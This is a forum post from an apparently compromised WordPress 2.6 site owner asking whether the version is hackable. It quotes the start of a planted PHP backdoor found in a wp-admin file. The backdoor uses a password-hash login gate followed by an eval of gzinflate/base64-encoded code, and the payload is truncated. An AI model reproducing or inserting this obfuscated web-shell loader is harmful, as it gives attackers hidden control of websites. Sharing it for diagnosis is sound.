WP 2.6 is hackable, hacked?
-
I just updated to wordpress 2.6 about a week ago.
Someone easily got onto my server and added a bunch of encoded code that adds extra pages to my main site, and made exploits on other sites on my server as well that don’t even have wordpress installed. They started the hack in a file in the “wp-admin” folder called “edit-page-set.php” – it was 45kb.
Here’s a sample of the code:
<?php session_start(); if(md5($_POST[pass])=='4ca83123fc97ebb33540d9ccda571335') {$_SESSION[logged]=1;} if(!$_SESSION[logged]) { print "<div style='position:absolute;left:40%;top:50%;'><form method=post><input name=pass><input type=submit value=login></form></div>"; exit;} eval(gzinflate(base64_decode('FJ3HcqPsFkUf53YVA3IakoPIGSa3yCByDk//y5Me..........
There’s several hundred lines of encoding after the above code.
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
- The topic ‘WP 2.6 is hackable, hacked?’ is closed to new replies.